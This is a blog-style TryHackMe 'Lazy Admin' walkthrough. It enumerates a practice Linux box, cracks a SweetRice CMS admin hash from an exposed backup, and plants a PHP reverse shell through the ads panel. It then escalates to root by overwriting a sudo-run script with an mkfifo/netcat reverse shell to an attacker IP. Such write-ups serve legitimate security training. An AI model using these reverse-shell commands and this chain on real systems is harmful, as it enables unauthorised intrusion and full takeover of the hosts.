Tryhackme — Lazy Admin

Description: Easy Linux machine to practice your skills.

Just going through the original challenges I did when I started THM and each one bringing with it, it’s own memories of “call this easy!!!” and “I’ll never get the hang of this!!”

Either way, they did get easier and I did get the hang of them. So let’s make a start by enumerating as usual:

ping

~ ping -c 4 $IP
PING 10.10.98.231 (10.10.98.231) 56(84) bytes of data.
64 bytes from 10.10.98.231: icmp_seq=1 ttl=63 time=17.0 ms
64 bytes from 10.10.98.231: icmp_seq=2 ttl=63 time=16.9 ms
64 bytes from 10.10.98.231: icmp_seq=3 ttl=63 time=16.9 ms
64 bytes from 10.10.98.231: icmp_seq=4 ttl=63 time=16.7 ms
--- 10.10.98.231 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 16.659/16.881/17.013/0.133 ms

nmap

~ nmap -sV -sC -A $IP    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-12 10:52 BST
Nmap scan report for 10.10.98.231
Host is up (0.018s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.67 seconds

gobuster

~ gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.98.231
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/12 10:56:18 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/content (Status: 301) [Size: 314] [--> http://10.10.98.231/content/]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 277]

===============================================================
2022/09/12 10:56:28 Finished
===============================================================

website

So the website we have on port 80, appears to be the default Apache2 Ubuntu default page:

However with the gobuster check indicating that a content folder exists, we can look at that:

gobuster 2 — the sequel

With the contents folder found, we can check for additional SweetRice directories.

~ gobuster dir -u http://$IP/content -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.98.231/content
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/12 11:00:56 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/_themes (Status: 301) [Size: 322] [--> http://10.10.98.231/content/_themes/]
/as (Status: 301) [Size: 317] [--> http://10.10.98.231/content/as/]
/attachment (Status: 301) [Size: 325] [--> http://10.10.98.231/content/attachment/]
/images (Status: 301) [Size: 321] [--> http://10.10.98.231/content/images/]
/inc (Status: 301) [Size: 318] [--> http://10.10.98.231/content/inc/]
/index.php (Status: 200) [Size: 2198]
/js (Status: 301) [Size: 317] [--> http://10.10.98.231/content/js/]

===============================================================
2022/09/12 11:01:04 Finished
===============================================================

This provides us with some additional threads we can investigate. Firstly we can check as which gives us a login screen.

Next as part of the continued enumeration we check inc which gives a list of files:

One that stands out is the backup folder:

We download that and a quick search provides us with a username and hashed password:

cat mysql_bakup_20191129023059-1.5.1.sql | grep passw
14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"m******r\\";s:6:\\"passwd\\";s:32:\\"42f74************f475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',

Checking the hash and putting it quickly through crackstation.net we get the password.

Using the credentials we gain access to the SweetRice admin panel. Luckily it provides us with the current version: 1.5.1, so a quick search on searchsploit provides us with the following:

~ searchsploit sweetrice
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
SweetRice 0.5.3 - Remote File Inclusion | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution | php/webapps/40700.html
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload | php/webapps/14184.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

So, from this we can actually see that backup disclosure, is where we got the initial username and password from. Another, the 40700 PHP code execution looks as though it could give us a reverse shell. Checking it out, we find:

~ searchsploit -x php/webapps/40700.html
# Description :
# In SweetRice CMS Panel In Adding Ads Section SweetRice Allow To Admin Add
PHP Codes In Ads File
# A CSRF Vulnerabilty In Adding Ads Section Allow To Attacker To Execute
PHP Codes On Server

So clicking on Ads gives us the opportunity to add a php reverse shell.

Using the pentestmonkeys php-reverse-shell.php and amending the file accordingly for our attacker box, we get:

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.11.12.13'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;

Now giving the add a name and finalising it with a click on done

Remembering our second gobuster scan, we found the folder ads and if we visit it, we can see our click_me.php file. Now before we exploit it, a quick netcat session with the port we selected — 4444.

nc -nlvp 4444      
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

And a quick curl command should start the reverse shell.

curl http://10.10.98.231/content/inc/ads/click_me.php

There we have it — the initial foothold on the machine.

nc -nlvp 4444      
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.98.231.
Ncat: Connection from 10.10.98.231:60346.
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
13:35:35 up 52 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Making the shell interactive:

python -c ‘import pty;pty.spawn(“/bin/bash”)’ # then press Ctrl+Z
stty raw -echo;fg # then press ENTER twice
export TERM=xterm

Let’s find out who is on the machine, with a quick check of the home folder:

Further checks then provide us with the user flag.

Next then, what can we actually do as the user www-data. A quick sudo -l gives us:

www-data@THM-Chal:/$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

Checking out the file, we see from the ls -l that we did earlier, that we can read and execute but not write. However, it runs a further script copy.sh:

-rw-r--r-x 1 root  root    47 Nov 29  2019 backup.plwww-data@THM-Chal:/$ cat /home/itguy/backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");

So now checking that file, it actually contains a bash reverse shell! From this all we need to do is amend the file with our attacker box and we are in on a root shell.

www-data@THM-Chal:/$ ls -l /etc/copy.sh 
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh
www-data@THM-Chal:/$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

In this case I used echo to get the data across. Then set up a port 5555 netcat session and ran the file with my sudo credentials.

www-data@THM-Chal:/$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.56.134 5555 >/tmp/f" > /etc/copy.shwww-data@THM-Chal:/$ sudo /usr/bin/perl /home/itguy/backup.pl================================nc -nlvp 5555      
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.98.231.
Ncat: Connection from 10.10.98.231:44210.
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{*************************}

A great little box, that I thoroughly enjoyed, but when I first started? Not so much. See how things change!!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
James Pearson

James Pearson

13 Followers

20 + years in an IT environment, working for companies such as Synstar, HP, DXC and Capgemini in a number of different service areas. Now a cyber CTF addict.